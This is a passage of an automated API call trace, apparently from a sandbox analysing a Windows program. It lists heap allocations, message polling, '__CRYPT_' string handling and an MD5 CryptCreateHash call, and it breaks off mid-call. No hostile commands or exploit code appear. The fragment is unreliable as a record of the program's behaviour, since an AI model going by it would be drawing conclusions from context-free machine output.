wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1710 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83610 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c8c8 [0264.810] PeekMessageW (in: lpMsg=0x91ef04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef04) returned 0 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1700 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c8c8 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1ce0 [0264.810] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1ce0 | out: hHeap=0xc60000) returned 1 [0264.811] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1720 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83610 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c8c8 [0264.811] PeekMessageW (in: lpMsg=0x91f0cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f0cc) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.811] PeekMessageW (in: lpMsg=0x91f0cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f0cc) returned 0 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c8c8 | out: hHeap=0xc60000) returned 1 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.811] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f324) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.811] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1ce0 [0264.811] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.812] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83610 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.812] PeekMessageW (in: lpMsg=0x91ef14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef14) returned 0 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1700 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16f0 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810c0 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835f8 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83640 [0264.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810f0 [0264.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81120 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83628 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb778 [0264.813] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83658 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.813] PeekMessageW (in: lpMsg=0x91ef14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef14) returned 0 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1700 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16f0 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83658 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83670 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81150 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83550 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fa0 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834a8 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834c0 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f70 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83478 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83490 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f40 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83448 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1710 [0264.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1710 | out: hHeap=0xc60000) returned 1 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1710 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83460 [0264.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xc60000) returned 1 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16e0 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16d0 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16d0 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16c0 [0264.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16c0 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16b0 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16b0 | out: hHeap=0xc60000) returned 1 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16b0 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16a0 [0264.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16a0 [0264.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0xe83418, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0264.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.819] GetProcAddress (hModule=0x74f20000, lpProcName="CryptCreateHash") returned 0x74f2df4e [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb778 [0264.819] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16a0 [0264.819] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.819] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.819] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1680 [0264.819] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1670 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1680 | out: hHeap=0xc60000) returned 1 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1670 | out: hHeap=0xc60000) returned 1 [0264.819] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.819] CryptCreateHash (in: hProv=0xcc72b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x91ef48 | out: phHash=0x91ef48) returned 1 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1680 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7380 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80f10 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83430 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83430 | out: hHeap=0xc60000) returned 1 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83418 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83430 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80ee0 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80ee0 | out: hHeap=0xc60000) returned 1 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83430 | out: hHeap=0xc60000) returned 1 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83430 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80ee0 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833e8 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833e8 | out: hHeap=0xc60000) returned 1 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.820] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80ee0 | out: hHeap=0xc60000) returned 1 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80ee0 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833e8 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83400 [0264.820] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83400 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833e8 | out: hHeap=0xc60000) returned 1 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833e8 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83400 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80eb0 [0264.821] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.821] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, 